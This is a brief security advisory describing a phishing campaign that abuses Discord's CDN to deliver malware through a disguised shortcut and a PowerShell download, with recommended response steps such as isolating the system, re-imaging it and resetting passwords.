A new phishing campaign has been discovered using Discord’s Content Delivery Network (CDN) to host and deliver malicious payloads. The campaign was identified after a phishing email led an end user to download a zip file containing a malicious shortcut disguised as a PDF. The shortcut triggered a PowerShell command that downloaded an executable and a PDF from Discord’s CDN, ultimately compromising the user’s system.
Attackers use Discord’s CDN infrastructure because it offers reliable and fast file distribution, taking advantage of Discord’s trusted reputation. By exploiting this, they can bypass security measures and deliver malware to targeted environments where Discord is permitted. In this campaign, the malicious payload consisted of an executable named ByelongBound.exe and a PDF named FASF240110.pdf, both hosted on Discord’s servers.
Security teams acted quickly to mitigate the impact, isolating the affected system from the network and recommending steps such as re-imaging the system and updating all user and admin passwords multiple times. These actions were essential to contain the malware’s spread and prevent further compromise.
Blocking Discord access for organizations that do not use it is suggested as a protective measure. The continued abuse of trusted networks like Discord’s CDN highlights the need for vigilance and updated security practices to mitigate the risk of such attacks.